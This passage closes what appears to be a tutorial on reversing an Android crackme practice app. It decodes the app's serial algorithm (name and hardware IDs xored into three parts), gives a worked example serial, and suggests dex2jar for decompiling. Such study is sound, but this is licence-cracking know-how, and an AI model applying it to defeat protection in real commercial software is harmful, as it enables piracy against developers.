As you can see, the algorithm is pretty straight forward. It is using name and two hardware ids as input and doing some operations on them to make a serial. We can quite easily recode it in any programming language that we prefer to make it as a keygen. Anyways, I am not posting any keygen sources as it will spoil the whole phun!
Decoding the Algorithm A demonstrative serial calculation routine is given below:
Here are stepwise instructions on generating final serial number
At first 'aaaaa' will be converted to '9797979797', from which we will take first 5 letters and convert it into integer 97979This will be ‘xor’ed with 0x6B016 resulting 511661 and this will be the first part of serial.For the second part, we will take the first 6 letters from HW ID1 and HW ID2, convert them to integer and xor, resulting 000000^890141 = 890141.For the third part we will use the first 6 characters from HW ID1.Formatting with the specified delimiter the serial will become '511661-890141-000000'.
Final Verification of Reversing Now let us put the same magic number into our Crackme application.
Bingo! Everything worked as expected. Now, for all those who think it is pretty hard to read all those deassembled instructions and manually converting them to higher language constructs, there are other options. As dalvik is based on the design of Java, it is also susceptible to decompilation. There is no decompiler available at this moment, but there is a hope.
For now we can use another utility which converts dex files to jar files so that we can use Java decompilers to see much more abstracted code. From the starting of this article you may have noticed a tool dex2jar. You can use the dex2jar to convert classes.dex to classes.dex.dex2jar.jar. Open it in a Java decompiler and you can see much better output than dalvik disassembly. Please note that dex2jar is still in a development phase and the output you get could be meaningless in many places. This should be used only to get a quick understanding of all the functions.
Conclusion In this introductory article, I explained reversing of an Android application using the emulator and all available tools in sequence with pictorial elaborative steps. It is mainly based to set up your ground for further reversing work on Android Platform. Well, that’s it! We have analyzed an Android program and defeated its protection. Cheerio!